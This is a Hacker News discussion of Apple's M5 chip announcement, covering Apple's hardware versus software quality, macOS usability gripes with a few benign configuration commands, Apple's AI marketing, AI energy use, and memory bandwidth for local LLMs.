    It does feel like Apple is firing on all cylinders in its core competency: hardware.

    Software (iOS 26), services (Music/TV/Cloud/Apple Intelligence) and marketing (just keep screaming "Apple Intelligence" for 3 months and then scream "Liquid Glass"), on the other hand, seem like they are losing steam or being very reactive.

    No wonder John Ternus is widely anticipated to replace Tim Cook (and not Craig).

  • JKCalhoun 19 hours ago

    There has to be a whole different mindset with hardware though. Every change has to necessarily be more considered, cross-checked. And I don't say this in any way to disparage software engineers (hold up hand) but I suspect there's a discipline in hardware design that is ... less rigidly adhered to in software design. (And a software update containing a revert, though undesirable, is always a solution.)

  • TheAtomic 20 hours ago

    Yup. And the marketing department is ahead of both of them.

  • eloisant 20 hours ago

    Apple have always been a hardware company, like Google have always been a software company even if they're doing hardware too now.

    • steve1977 19 hours ago

      Google has always been an advertising company.

      • tempest_ 14 hours ago

        It wasn't always, but it definitely has been the host for the DoubleClick parasite it ingested in the early 2000s.

      • hinkley 11 hours ago

        advertising company/feedlot to hoard good engineers and keep them from wandering off and writing a competitor.

    • CharlesW 18 hours ago

      > Apple have always been a hardware company…

      Apple (post Apple II) has always been a systems company, which is much different. Dell is a hardware company.

  • kace91 20 hours ago

    There is talk of the hardware head replacing Cook.

    Hopefully that will bring whatever they’re doing right to other teams.

    • butlike 20 hours ago

      I really liked the energy of the guy who announced the iPhone Air this past WWDC or whatever it's called now. John Ternus. Hopefully he makes it there (CEO) one day; I'd like to see it.

      • thewebguyd 19 hours ago

        Ternus is who the parent was referring to, he's SVP of hardware engineering and suspected to be Cook's successor.

  • elicash 20 hours ago

    For Vision Pro, software team has been impressive. And arguably outperformed the hardware team.

    But this is the exception.

  • foofoo12 20 hours ago

    It must be observed that the Apple enterprise is, above all else, a purveyor of fine physical contrivances and apparatus.

    Furthermore, they do also engage in the traffic and sale of digital programmes wrought by the hands of other, independent artisans.

  • mproud 18 hours ago

    The hardware team has always shined, but how about one example of this:

    The PowerBooks from the mid-1990s were hugely successful, especially the first ones, which were notable for something we now take for granted: pushing the keyboard back to allow space for palm rests. Wikipedia says at one time Apple had captured 40% of the laptop market. Yet all the while the '90s roared on, Apple was languishing, looking for a modern OS.

  • mcv 20 hours ago

    I want this hardware available for other systems.

    • ksec 20 hours ago

      The modern Arm C1-Ultra core is only 10% slower than the M5, likely even less when you factor in system-level cache and memory. So the gap isn't as wide as most people think it is.

      • mcv 13 hours ago

        That sounds awesome. Can we get laptops with that thing? We should be getting rid of the power-hungry x86 stuff.

        • ksec 7 hours ago

          Mediatek and Nvidia should have something out soon.

      • hamdingers 17 hours ago

        What laptops is that chip featured in?

  • nabla9 19 hours ago

    Doing a good job is rewarded.

    Apple's Hardware Chief, John Ternus, seems to be next in line for succession to Tim Cook's position.

    • utf_8x 18 hours ago

      Interesting, I thought the next in line was Craig Federighi

  • markus_zhang 20 hours ago

    I pretty much see the MacBook as a fancy toy with mediocre software. Maybe the kernel is solid, but the other software is very meh, even compared to Windows. But I'm definitely biased as a Windows/Linux user, and my hobby is systems programming, so naturally a Linux box is more suitable.

    Biggest grief with MacOS software:

    - Finder is very mediocre compared to even File Explorer in Windows

    - Scrollbar and other UI issues

    Unfortunately I don't think Asahi is going to catch up, and MacBooks are so expensive, so I'll probably keep buying second-hand Dell/Lenovo laptops and dumping Linux on top of them.

    • Sohcahtoa82 19 hours ago

      > - Finder is very mediocre comparing to even File explorer in Windows

      It really is awful. Why the hell is there no key to delete a file? Where's the "cut" option for moving a file? Why is there no option for showing ALL folders (i.e., /bin, /etc) without having to memorize some esoteric key combination?

      For fuck's sake, even my home directory is hidden by default.
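
      (For reference, the esoteric bits: Cmd+Shift+. toggles hidden files in an open Finder window, or it can be flipped permanently from the shell:)

          # show hidden files and folders in Finder, then relaunch it
          defaults write com.apple.finder AppleShowAllFiles -bool true
          killall Finder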

      > - Scrollbar and other UI issues

      Disappearing scrollbars make sense on mobile where screen real estate is at a premium and people don't typically interact with them. It does not make sense on any screen that you'd use a mouse to navigate.

      For years, you couldn't even disable mouse acceleration without either an esoteric command line or 3rd-party software. Even now, you can't disable scroll wheel acceleration. I hate that I can't just get a consistent "one click = ~2 lines of text" behavior.
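
      The esoteric command line in question, for the record (this was the global preference for years; recent macOS versions finally added a pointer-acceleration toggle in Settings):

          # a negative scaling value disables pointer acceleration
          defaults write -g com.apple.mouse.scaling -1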

      I could go on and on about the just outright dumb decisions regarding UX in MacOS. So many things just don't make sense, and I feel like they were done for the sole purpose of being different from everyone else, rather than because of a sense of being better.

      • dd_xplore 16 hours ago

        You know, IMHO Apple doesn't have any 'Pro' machines. A 'Pro' machine isn't about hardware (although it helps); it comes mainly from the software.

        MacOS doesn't have enough 'openness' to it. There's no debug information, there's a lack of tools, etc. To this day I could still daily drive an XP or 98/2000 machine (if it supported the modern web) because all the essentials are still intact. You can look around the system files; you can customize and edit them. I could modify game files to change their behaviour. I could modify the Windows registry in tons of ways to customize my experience and experiment with lots of things.

        As a 'Pro' user my first expectation is options, options in everything I do, which MacOS lacks severely.

        All the random hardware that we see launching from time to time has drivers for Windows but not for Mac. Even Linux has tons of terminal tools and customisation.

        MacOS is like a glorified phone OS. It's weirdly locked down in certain places that drive you crazy. Tons of things do not have context menus (Windows is filled with them).

        Window management sucks, and there's no device manager! Not even CLI tools! (Or maybe I'm not aware?) Why can't I simply cut and paste?

        There's no API/way to control system elements via scripting; Windows and Linux are filled to the brim with these. Even though the UI is good-looking, I just cannot switch to an Apple device (either Mac or iPhone) for these reasons. I bought an iPad Pro and I'm regretting it. There's no Termux equivalent on iPadOS/iOS; there are some terminal tools, but they can't use the full processing power, they can't multi-thread, and they can't run in the background. It's just ridiculous. The iPad Pro is just a glorified iPhone. Hardware doesn't make a device 'Pro'; software does. Video editing isn't a 'Pro' workflow in the sense that it can be done on any machine that has sufficient oomph. An iPad Pro from 5 years ago will be slower than an iPad Air of today; does that make the Air a 'Pro' device? No!

        • astrange 16 hours ago

          > As a 'Pro' user my first expectation is options, options in everything I do , which MacOS lacks severely.

          It's a bad idea to add an option entirely for the purpose of making the product not work anymore.

          https://limi.net/checkboxes

          > Window management sucks

          I'm always mystified reading these kinds of posts on HN because it literally always starts out as "macOS is an OS for babies" and turns out to mean "macOS doesn't have a tiling window manager". Like, cmon man, who cares.

          > there's no device manager! Not even cli tools!

          `ioreg -l` or `system_profiler`. Why does this matter?

          > There's no API/way to control system elements via scripting

          https://developer.apple.com/library/archive/documentation/Ac...

          https://developer.apple.com/documentation/XCUIAutomation

          https://en.wikipedia.org/wiki/AppleScript

          https://support.apple.com/guide/shortcuts/welcome/ios
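
          And for one-off control from the shell, `osascript` drives the same AppleScript machinery, e.g.:

              # open the user's home folder in Finder via AppleScript
              osascript -e 'tell application "Finder" to open home'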

          • robenkleene 10 hours ago

            > I'm always mystified reading these kinds of posts on HN because it literally always starts out as "macOS is an OS for babies" and turns out to mean "macOS doesn't have a tiling window manager". Like, cmon man, who cares.

            The tiling window manager thing is epidemic on Hacker News, and I think the explanation is twofold: Hacker News obviously leans towards programmers, programmers in general don't like the mouse, and tiling window managers, as a general rule, are about avoiding managing windows with the mouse.

            The problem with that viewpoint, to me, is that programming is literally the only complex modern computing task I can think of that isn't mouse-centric. E.g., if you're doing CAD, spreadsheet work, media editing, 3D, or audio editing, all of those tasks are mouse-centric, and the tiling thing just feels silly to me in that context (like I'm going to put Cinema 4D in a tile?). So it solves a problem I don't have (managing, what, my IDE and terminal windows? this isn't even something I think about) and seems like it would make things I find hard today even harder (arranging the Cinema 4D Redshift material graph, render preview, object manager, and geometry view where I can see the important parts of each at the same time, which I do by arranging overlapping windows carefully).

          • Sohcahtoa82 13 hours ago

            > > Window management sucks

            > I'm always mystified reading these kinds of posts on HN because it literally always starts out as "macOS is an OS for babies" and turns out to mean "macOS doesn't have a tiling window manager". Like, cmon man, who cares.

            For me, it's not so much the window management but the task management. I very strongly believe that the taskbar (the Dock in MacOS, I guess) should have a separate item for each open window of an app. If I have 3 Firefox windows open, that should be 3 entries in the taskbar/Dock so I can switch between them in a single click. I can do this in Windows; I can't do it in MacOS.

            One of the problems I have with MacOS is that it's not obvious how to start a second instance of an app. Sure, some apps have a "New Window" option. But what about apps that don't, like Burp Suite? If I bring up the launcher and click Burp Suite when one is already loaded, it just shows me the existing one.

            • astrange 12 hours ago

              You can't start a second instance of an app. Or rather you can (run the app binary from the Terminal) but apps are not required to expect you to do this, and it would probably lead to data corruption from them writing to shared files.

              A weakness of this is that you can duplicate apps and launch the duplicate; even though they have the same bundle ID, they might still fight over things.
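
              (For completeness, the Terminal route is usually `open -n`, which forces a new instance, with exactly the caveats above:)

                  # -n asks Launch Services to open a new instance even if the app is already running
                  open -n -a "Burp Suite"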

            • NetMageSCW 11 hours ago

              No, your problem is that you brought over your expectations from non-macOS systems and then expected the Mac to be similar. That isn't how it works. Do you complain that Windows doesn't have bash, or that Linux doesn't support ACLs easily?

              • dd_xplore an hour ago

                Even as kids we were fiddling with batch/bash scripts; how many kids do you see using AppleScript or whatever? It's the ease of accessibility.

                PowerShell now is a lot more powerful than anything Apple can dream of offering. MacOS is an opinionated OS for people who want to do simple tasks. MacOS, apart from good looks, offers nothing else.

              • astrange 9 hours ago

                > Do you complain that Windows doesn’t have a bash or that Linux doesn’t support ACLs easily?

                Don't both of those exist now?

                The reason the Mac is more "app-centric" is Conway's law; developers own apps so it's thought if you tried breaking apart an app it would fail, since previous "document-centric" efforts like OpenDoc failed.

        • NetMageSCW 11 hours ago

          All of that is exactly the opposite of what a Pro machine should be. Pros want hardware that works without fiddling to get their real job done. They know that configuring the OS or adjusting the GUI or discussing File Explorer differences is just a waste of time that has nothing to do with their job.

          • dd_xplore an hour ago

            Doesn't the hardware work in the Air series? Doesn't the hardware work in Windows machines? Hardware works almost everywhere!

      • dsego 2 hours ago

        > Where's the "cut" option for moving a file?

        You don't cut, you move: copy the file (Cmd+C), then hold Option when pasting (Cmd+Option+V), which moves it instead of copying.

      • cmiller1 18 hours ago

        > Why the hell is there no key to delete a file?

        Cmd+delete? I don't really want it to be a single key as it's too easy to accidentally trigger (say I try to delete some text in a filename but accidentally bump my mouse and lose focus on the name)

      • aardshark 10 hours ago

        Explorer is not good, and finder isn't much better.

      • BeFlatXIII 15 hours ago

        > Why the hell is there no key to delete a file?

        Command+Backspace.

      • kemayo 18 hours ago

        > Why the hell is there no key to delete a file?

        Command + backspace.

    • lou1306 20 hours ago

      What makes Mac great is/was the ecosystem of 3rd party tools with great UI and features. Apple used to be good enough at writing basic 1st-party apps that would mostly just disappear into the background and let you do your thing, but they are getting increasingly "louder" which... may become a problem.

      I still agree that second hand Thinkpads are ridiculously better in terms of price/quality ratio, and also more environmentally sustainable.

      • markus_zhang 19 hours ago

        I have to admit, every time I've looked at screenshots of earlier Macs, like the 68K and PPC ones, I felt I loved the UI and such. I even bought a PPC laptop (I think it's a maxed-out iBook with 1.5GB of RAM) to tinker with PPC assembly.

        But I could be wrong. Maybe the earlier Macs didn't have great software either -- but at least the UI was better.

        • prewett 16 hours ago

          Having lived through those days... well, it was good for the time, mostly. MacOS was definitely better than Windows 3.11, and a lot more whimsical, both the OS and Mac software in general, which I miss. The featureset, though, was limited. Managing extensions was clunky, and until MacOS 10, applications had a fixed amount of RAM they could use, which could be set by the user, but which was allocated at program start. It was also shared memory, like Windows 3.11 and to some extent Windows 95/98, so one program could, and routinely did, take down the whole OS. With Windows NT (not much adopted by consumers, to be fair), this did not happen. Windows NT and 2000 were definitely better than MacOS, arguably even UI-wise.

          I do miss window shading from MacOS 8 or 9, though. I think a whimsical skin for MacOS would be nice, too. The system error bomb icon was classic, the sad-Mac boot-failure icon was at least consolation. Now everything is cold and professional, but at least it stays out of my way and looks decent.

          • markus_zhang 14 hours ago

            Interesting. I thought the new MacOS was unix-y? But I never owned a Mac back then, so I'm not sure. For me, Windows 2000 is the pinnacle: it didn't crash (often), it supported most of the games I played then, and I like the UI design.

  • amelius 18 hours ago

    Yes. And their consumer teams are way outperforming their business teams.

  • tantalor 20 hours ago

    Been like that since 1977

  • gloosx 16 hours ago

    From my vast experience with macOS, Apple is notoriously bad at the most basic software, like Notes or Calculator

    • robenkleene 10 hours ago

      What's a better rich-text notes app than Apple Notes? (E.g., excluding the plain-text options like Obsidian, which are really a different beast.)

      • gloosx 3 hours ago

        I don't know. I used Apple Notes for quite a while, several years. And I got increasingly frustrated by its countless bugs and inconsistent or weird behaviours, especially with checklists, which I use a lot. I even have a folder with tens of screencasts capturing these bugs, which I want to compile and publish in a blog post one day. I ended up with my own web-based solution on top of Lexical, which I wrapped in a Tauri app, and which I very much enjoy using. I don't need it to sync to other devices, so all notes and images live in the filesystem.

  • crazygringo 17 hours ago

    Apple is a hardware company. This has always been the case. It's not just the modern Apple.

  • oofbey 18 hours ago

    In a sense, hardware's job is easier, because the goals are more clear. Make it faster, and more power efficient. Vast amounts of complexity within those goals. But try to summarize the north-star vision for a complex software project like an OS in terms anywhere close as simply as this.

  • wslh 19 hours ago

    I've been thinking whether it could be a reasonable move for Apple to launch a cheaper secondary brand, one that offers devices capable of running Linux or Windows to reach a broader market without cannibalizing its own.

    • dawnerd 19 hours ago

      Apple already sells pretty competitively priced computers. The base Mac mini for example. For most people that’s already overkill.

  • throw_this_one 20 hours ago

    Their software is literally falling apart. iOS 26 was the biggest trash I've ever experienced from a company this big

    • pivo 20 hours ago

      How so? Seriously asking because it works fine for me.

      • throw_this_one 18 hours ago

        Buggy. Random slowness in the UI, dropping well below 120Hz. Massive battery drain for no reason. UI elements just looking out of place: big print, in random places.

        The UI itself is supposed to be intense to render, to some degree. That's crazy, because most of the time it looks like an Android skin from 2012.

        And on top of it all -- absolutely nobody asked for this. No one asked for some silly new UI that is transparent or whatever.

        • lijok 17 hours ago

          Sounds like an experience problem

    • vuggamie 20 hours ago

      I'm old enough to remember Windows CE phones crashing during phone calls.

  • 7e 19 hours ago

    Apple relies heavily on H-1B slave labor. They don't pay their software teams enough to be competitive, and they run with only about a third of the headcount they need to polish the software. Thus, they have mediocre talent and not enough of it. Penny-wise, pound-foolish.

mohsen1 20 hours ago

First time seeing Apple using "AI" in their marketing material. It was "Machine Learning" and "Apple Intelligence" before...

  • mentalgear 20 hours ago

    Unfortunately, they have also succumbed to the AI hype machine. Apple calling it by its actual name, "machine learning", was about the only thing I still liked about Apple.

    • rpdillon 20 hours ago

      Wait, didn't they try to backronym their way into "Apple Intelligence" last cycle?

      https://www.apple.com/apple-intelligence/

      • kryllic 20 hours ago

        Probably don't want to draw more attention to their ongoing lawsuits [1]. Apple, for all its faults, does enjoy consistency, and the unruly nature of LLMs is something I'm shocked they thought they could tame in a short amount of time. The fallout of the hilariously bad news/message "summaries" was more than enough to spook Apple from allowing that to go much further.

        >Built into your iPhone, iPad, Mac, and Apple Vision Pro* to help you write, express yourself, and get things done effortlessly.** Designed with groundbreaking privacy at every step.

        The asterisks are really icing on the cake here.

        ---

        [1] https://news.bloomberglaw.com/ip-law/apple-accused-of-ai-cop...

    • kgwgk 20 hours ago

      > actual name "machine learning"

      Yesterday’s hype is today’s humility.

    • adastra22 16 hours ago

      Machine learning is a bit more specific than what we now call AI, no?

      • asadotzler 12 hours ago

        the other way around.

        • adastra22 11 hours ago

          I don’t follow. Machine learning was coined to specifically describe the application of neural networks to unsupervised classification systems. Its meaning has grown beyond that, but at the outset, it was a niche part of artificial intelligence. Now you’re saying that AI is a subset of machine learning?

          • zargon 3 hours ago

            > what we now call AI

            (Emphasis added)

            When a company (or most people) today (now) says “AI”, they are not referring to the area of study traditionally called artificial intelligence. They are talking exclusively about transformers or diffusion.

          • I_AM_A_SMURF 4 hours ago

            Lately AI = LLM (at least in popular culture).

  • vessenes 19 hours ago

    I like sniping, but I could make a product call here to support the messaging: when it's running diffusion models and LLMs (as per the press release), we could call that AI. Agreed that they should at least have mentioned Apple Intelligence in their PR though

  • low_tech_punk 20 hours ago

    Not all is lost: AI can still be an acronym for Apple Intelligence.

  • vayup 18 hours ago

    I am sure by AI they mean Apple Intelligence:-)

outcoldman 20 hours ago

Marketing:

M5 announcement [1] says 4x the peak GPU compute performance for AI compared to M4. I guess in the lab?

Both the iPad and MBP M5 announcements [2][3] say "delivering up to 3.5x the AI performance". But in all the AI examples (in [3]) they are only 1.2-2.3x faster than the M4. So where is this 3.5x coming from? What tests did Apple run to show that?

---

1. https://www.apple.com/newsroom/2025/10/apple-unleashes-m5-th...

2. https://www.apple.com/newsroom/2025/10/apple-unveils-new-14-...

3. https://www.apple.com/newsroom/2025/10/apple-introduces-the-...

  • storus 17 hours ago

    M5 is supposed to support FP4 natively which would explain the speed up on Q4 quantized models (down from BF16).

  • relativeadv 20 hours ago

    It's not uncommon for Apple and others to compare against two generations ago rather than the immediately preceding one.

    • outcoldman 17 hours ago

      Everything I referenced compares against the M4. I left out the comparison with the M1.

Noaidi 20 hours ago

I am wondering if Apple's focus is off lately with this drive for AI. So far all they are showing in that presentation is that I can have

"the ability to transform 2D photos into spatial scenes in the Photos app, or generating a Persona — operate with greater speed and efficiency."

And by making Apple AI (which is something I do not use for many reasons, but mainly because of climate change) their focus, I am afraid they are losing their way and making their operating systems worse.

For instance, Liquid Glass, which I was lucky enough to uninstall before they put in the embargo against doing so, is, well, a mess. An alpha release in my opinion, and I feel it was a distraction from their lack of a robust AI release.

So by blowing money on the AI gold rush that they were too late for, will they ultimately ruin their products across the board?

I am currently attempting to sell my iPhone 16E and my M1 Macbook Air to move back to Linux because of all of this.

  • Tagbert 17 hours ago

    Most of the AI and machine learning Apple has done so far runs primarily on device, so you can judge for yourself whether there is any climate change concern or not.

  • knotimpressed 20 hours ago

    Assuming you've read https://andymasley.substack.com/p/a-cheat-sheet-for-conversa... or the longer full essay/related works, could you elaborate on why you don't use Apple Intelligence?

    I totally understand why someone would refuse to use it due to environmental reasons (amongst others) but I'm curious to hear your opinions on it.

    • Noaidi 19 hours ago

      Some commenters already answered for me. To me there is no real use benefit. I am rather a simple user and it seems to take up space on the phone as well. I refuse to use iCloud so space is important to me since photography is what I do the most.

      Also, I like researching things old school how I learned in college because I think it leads to unintended discoveries.

      I do not trust the source you linked to. It is an organization buried under organizations, whose funding source I cannot seem to find after looking for a good 15 minutes this morning. It led me back to https://ev.org/ where I found out one guy used to work for "Bain and Company", a consulting firm, and was associated with FTX funding:

      https://oxfordclarion.uk/wytham-abbey-and-the-end-of-the-eff...

      Besides "Effective Altruism" makes no sense to me. Altruism is Altruism IMO.

      Altruism: unselfish regard for or devotion to the welfare of others

      There is no way to be ineffective at altruism. The more you have to think about altruism the further you get from it.

      But the organization stinks as some kind of tech propaganda arm to me.

    • adastra22 15 hours ago

      > I totally understand why someone would refuse to use it due to environmental reasons

      Huh. This one baffles me.

      • AuryGlenz 4 hours ago

        Energy use, presumably.

        Of course, are those same users always running their screens super dim? Are they using pen + paper instead of typing whenever they can?

    • sylens 20 hours ago

      > could you elaborate on why you don't use Apple Intelligence?

      Why would I trust this when they can't deliver a voice assistant that can parse my sentences beyond "Set a reminder" or "Set a timer"? They have neglected this area of their products for over a decade; they are not owed the benefit of the doubt.

    • pcdoodle 20 hours ago

      For me: unproven trust and no killer feature.

      If I can't search my Apple Mail without AI, why would I trust AI?

    • timeon 19 hours ago

      Not sure why one would think that article is anything other than a distraction attempt. Because emissions add up.

      I'm from a country (in Europe) where CO2 emissions per capita [0] are 5.57 tonnes, while the number for the USA is 14.3, so reading this sentence in that article: "The average American uses ~50,000 times as much water every day..." surely does not imply that one should use ChatGPT because it is nothing. If the "average American" wants to decrease emissions, then not using LLMs is just a start.

      [0]: https://ourworldindata.org/grapher/co-emissions-per-capita

      • NetMageSCW 11 hours ago

        This isn't about ChatGPT; this is about Apple Intelligence, which is an on-device, low-power ML system.

  • StopDisinfo910 20 hours ago

    > making Apple AI [...] their focus

    Are they really doing that? Because if it's the case they have shockingly little to show for it.

    Their last few attempts at actual innovation seem to have been less than successful. The Vision Pro failed to find an audience. Liquid Glass is, to put it politely, divisive.

    At this point, it seems to me that good SoCs and a captive audience in the US are pretty much all they have left, and competition on the SoC front is becoming fierce.

    • Noaidi 19 hours ago

      Yeah, I agree, they have a captive audience for sure. But they still need to satisfy shareholders. If people are failing to upgrade, that is a problem. And the battery drain on my iPhone 16e on Glass was horrific. I know casual users who did not notice until I pointed it out, and then they tracked it better. This, unfortunately, makes me think conspiratorially. Even a modest amount of extra battery use and degradation will mean more upgrades in the future.

      But I think $500 billion is a lot of money for AI:

      Apple accelerates AI investment with $500B for skills, infrastructure

      https://www.ciodive.com/news/Apple-AI-infrastructure-investm...

      Imagine using that $500 billion on the operating system and squashing bugs, or making the system even more energy efficient? Or maybe figuring out how to connect to an Android tablet's file system natively?

  • steinvakt2 20 hours ago

    If you don't use AI for climate reasons, then you should read the recent reports about how little electricity and water are actually used. It's basically zero (image and video models excluded). Your information about this is probably based on GPT-3.5 or something, which is now 3 years old - a lifetime in the AI world.

    • greekrich92 20 hours ago

      Big data centers running tons of GPUs, and the construction of even bigger ones, are not carbon neutral, come on

    • wat10000 20 hours ago

      Don't newer models use more energy? I thought they were getting bigger and more computationally intensive.

      • trenchpilgrim 20 hours ago

        They use a massive amount of energy during training. During inference they use a tiny amount of energy, less than a web search (turns out you can be really efficient if you don't mind giving wrong answers at random, and can therefore skip expensive database queries!)

        • wat10000 18 hours ago

          Right, but the comment I was responding to suggested that ChatGPT3.5 used lots of energy and newer models use less.

          • trenchpilgrim 16 hours ago

            Indeed, this is correct. See today's Claude Haiku 4 announcement for an example.

  • imcritic 20 hours ago

    I think they will continue ruining their products via software updates. That's implied by the walled-garden approach they chose for their business: it forces users to consoom more and thus generates profits. Apple isn't a "lean" company; it needs outrageous profits to stay afloat.

  • jeffbee 19 hours ago

    I'm interested in reading about your low-carbon lifestyle that is so efficient you got to the point of giving up machine inference.

    • Noaidi 18 hours ago

      I live in a van full time. I have a 200w solar panel and a 1500w output solar battery that powers everything I use, mostly for cooking, sometimes heat. I also poop in the woods a lot. :) I do not use the internet much really. Driving is my biggest carbon footprint but I really do not put much more mileage than the average suburban person. Anyway, I try my best. I am permanently disabled so that makes a lot of it easier. Being poor dramatically lowers ones carbon footprint.

      • jeffbee 18 hours ago

        If you drive a van as much as the average suburbanite drives their vehicle, emitting ~10 metric tons of CO2 annually, posting about how you gave up local machine inference for the climate is performative and asinine. Burning 1000 gallons of motor fuel has the same GHG impact as 300 million uses of Google Gemini, and the CO2 impact of local inference on a Mac is even less.
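
        (A rough sanity check on the fuel figure, using the EPA's commonly cited ~8.9 kg of CO2 per gallon of gasoline; the Gemini comparison is the poster's own number and isn't checked here:)

          KG_CO2_PER_GALLON = 8.887        # EPA estimate for gasoline
          gallons_per_year = 1000
          print(gallons_per_year * KG_CO2_PER_GALLON / 1000)  # ~8.9 metric tons CO2/year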

        • leakycap 16 hours ago

          What a nice way to talk to another person who... didn't attack you?

          A typical passenger car driving 12,000 miles puts out about 5 metric tons of CO2.

          The person driving that passenger car likely has a 1,000 sq ft or larger home or apartment, which can vary widely but could be reasonably estimated at another 5 metric tons of CO2 (Miami vs. Minnesota makes a huge difference)

          So we're at 10 metric tons for someone who doesn't live in a van but still drives like a suburbanite

          Care to be a little kinder next time you feel whatever compelled you to write your response to the other user? Jeesh.

        • Noaidi 14 hours ago

          First, I need my van. My van is my house.

          > Burning 1000 gallons of motor fuel has the same GHG impact as 300 million uses of Google Gemini, and the CO2 impact of local inference on a Mac is even less

          Still, even if, let's say, your numbers are correct (and I feel they are not), does that mean I should just add to the problem and use something I do not need?

          Driving my van for my yearly average creates about 4.4 metric tons of CO2.

          "A more recent study reported that training GPT-3 with 175 billion parameters consumed 1287 MWh of electricity, and resulted in carbon emissions of 502 metric tons of carbon, equivalent to driving 112 gasoline powered cars for a year."

          https://news.climate.columbia.edu/2023/06/09/ais-growing-car...

          Just to get an idea of how I conserve, another example: I only watch videos in 480p because it uses less power. This has a double benefit for me, since it saves my solar battery as well.

          I am not bragging, just showing what is possible. Right now, still being in the desert this week, my carbon footprint is extremely low.

          Second, I cannot really trust most numbers that are coming out regarding AI. Sorry, just too much confusion and green-washing. For example, Meta is building an AI site that is about the size of Manhattan. Is all the carbon used to build that counted in the equations?

          But this paper from 5/25:

          https://www.technologyreview.com/2025/05/20/1116327/ai-energ...

          says "by 2028 more than half of the electricity going to data centers will be used for AI. At that point, AI alone could consume as much electricity annually as 22% of all US households."

          And

          "Tallies of AI’s energy use often short-circuit the conversation—either by scolding individual behavior, or by triggering comparisons to bigger climate offenders. Both reactions dodge the point: AI is unavoidable, and even if a single query is low-impact, governments and companies are now shaping a much larger energy future around AI’s needs."

          And

          "The Lawrence Berkeley researchers offered a blunt critique of where things stand, saying that the information disclosed by tech companies, data center operators, utility companies, and hardware manufacturers is simply not enough to make reasonable projections about the unprecedented energy demands of this future or estimate the emissions it will create. "

          So the confusion and obfuscation are enough for me to avoid it. I think AI should be restrained to research, not used for most of the silliness and AI slop that is being produced. Because, you know, we are not even counting the AI slop views that also take up data space and energy as people look at it all.

          But part of why I do not use it is my little boycott. I do not like AI, at least how it is being misused to create porn and AI slop instead of doing the great things it might do. They are misusing AI to make a profit. And that is also what I protest.

    • timeon 19 hours ago

      Depends where you are. People in some countries have lot of catching up: https://ourworldindata.org/grapher/co-emissions-per-capita

      Maybe they are in the USA - every little thing counts there.

      • Noaidi 18 hours ago

        I am in the US, and thanks for that link. I am of the opinion that the Climate Crisis should be the number one focus for everyone right now.

        So, to keep this on point, Apple making a faster chip is not on my climate change agenda and anything but negative.

      • jeffbee 18 hours ago

        No, in the USA it is the opposite. The little things do not and cannot add up to anything. The only things that make a difference are motor fuels and hamburgers.

yalogin 20 hours ago

It feels like Apple is "a square peg in a round hole" when it comes to AI - at least for now.

They are not the hardware provider like Nvidia, and they don't do the software and services like OpenAI or even Microsoft/Oracle. So they are struggling to find a foothold here. I am sure they are working on a lot of things, but the only way to showcase them is through their phone, which ironically enough feels like not the best path for Apple.

Apple’s best option is to put llms locally on the phone and claim privacy (which is true) but they may end up in the same Siri vs others situation, where Siri always is the dumber one.

It will be interesting to see how this plays out.

  • mirekrusin 19 hours ago

    Being late to the AI race, or not entering it from the training side, is not necessarily bad; others have burned tons of money. If Apple enters with their hardware first (only?), it may disrupt the status quo from the consumer side. It's not impossible that they'll produce hardware everybody will want, to run local models on par with closed ones. If this happens, it may change where real money flows (as opposed to investor money based on imaginary valuations, which can evaporate).

  • mft_ 17 hours ago

    They are the leader in manufacturing consumer systems with sufficient high-bandwidth memory to enable decent-sized LLMs to be run locally with reasonable performance. If you want to run something that needs >=32GB of memory (which is frankly bottom-end for a somewhat capable LLM) they're your only widely-available choice (otherwise you've got the rare Strix Halo AI Max+ 395 chip, or you need multiple GPUs, or maybe a self-build based around a Threadripper.)

    This might not be widely recognised, as the proportion of people wanting to run capable LLMs locally is likely a rounding error versus the people who use ChatGPT/Claude/Gemini regularly. It's also not something that Apple market on, as they can't monetize it. However, as time goes on and memory and compute power gradually decrease in price, and also maybe as local LLMs continue to increase in ability (?) it may become more and more relevant.

    • yalogin 16 hours ago

      All the current use cases, the ones that caught the public eye, just don't have a need for locally run LLMs. Apple has to come up with functionality that can work with on-device LLMs, and that is hard to do. There aren't that many use cases for it, as the input vectors all map to an app or camera. Even then, a full-fledged LLM is always better than a quantized, low-precision one running locally. Yeah, increased compute is the way, but not a silver bullet, as vision- and audio-bound LLMs require large amounts of memory.

nik736 21 hours ago

This is only the base model, no upgrades yet for the Pro/Max version. The memory bandwidth is 153GB/s which is not enough to run viable open source LLM models properly.

  • wizee 20 hours ago

    153 GB/s is not bad at all for a base model; the Nvidia DGX Spark has only 273 GB/s memory bandwidth despite being billed as a desktop "AI supercomputer".

    Models like Qwen 3 30B-A3B and GPT-OSS 20B, both quite decent, should be able to run at 30+ tokens/sec at typical (4-bit) quantizations.
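
    A rough back-of-envelope supporting that, assuming decode is purely bandwidth-bound, that only the ~3B active parameters (the "A3B") are read per token, and ~4.5 bits/weight effective (quant plus overhead); these are illustrative assumptions, not measured numbers:

      bandwidth_gb_s = 153.6                         # base M5
      active_params = 3e9                            # MoE: ~3B params active per token
      gb_per_token = active_params * 4.5 / 8 / 1e9   # ~1.7 GB streamed per token
      print(bandwidth_gb_s / gb_per_token)           # ~91 tokens/s theoretical ceiling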

    • zamadatix 20 hours ago

      Even at 1.8x the base memory bandwidth and 4x the memory capacity Nvidia spent a lot of time talking about how you can pair two DGXs together with the 200G NIC to be able to slowly run quantized versions of the models everyone was actually interested in.

      Neither product actually qualifies for the task IMO, and that doesn't change just because two companies advertised them as such instead of just one. The absolute highest end Apple Silicon variants tend to be a bit more reasonable, but the price advantage goes out the window too.

      • cma 19 hours ago

        The M5 has 3x Thunderbolt 5, so it should be able to do 240Gb/s bidirectional in total. Not that useful yet with a max of 32GB of RAM though.

  • replete 14 hours ago

    Looks like the M5 base has LPDDR5x-9600, which works out to 153.6GB/s, up from the base M4's 120GB/s (LPDDR5x-7500). The Pro/Max versions have more memory controllers: 16, 24, and 32 channels respectively. The 32-channel top-end M5 will have 614GB/s by my calculations.

    It would take 48 channels of LPDDR5x-9600 to match a 3090's memory bandwidth, so the situation is unlikely to change for a couple of years, until DDR6 arrives, I guess
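
    For reference, the arithmetic behind those numbers, assuming 16-bit LPDDR5x channels (2 bytes per transfer per channel):

      # Peak bandwidth = channels x MT/s x 2 bytes per 16-bit channel.
      def peak_gb_s(channels, mt_s=9600):
          return channels * mt_s * 2 / 1000
      for ch in (8, 16, 24, 32, 48):
          print(ch, peak_gb_s(ch))
      # 8 -> 153.6 (base M5), 32 -> 614.4, 48 -> 921.6 (vs ~936 for a 3090)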

  • mpeg 21 hours ago

    The memory capacity to me is an even bigger problem, at 32GB max.

    • sgt 20 hours ago

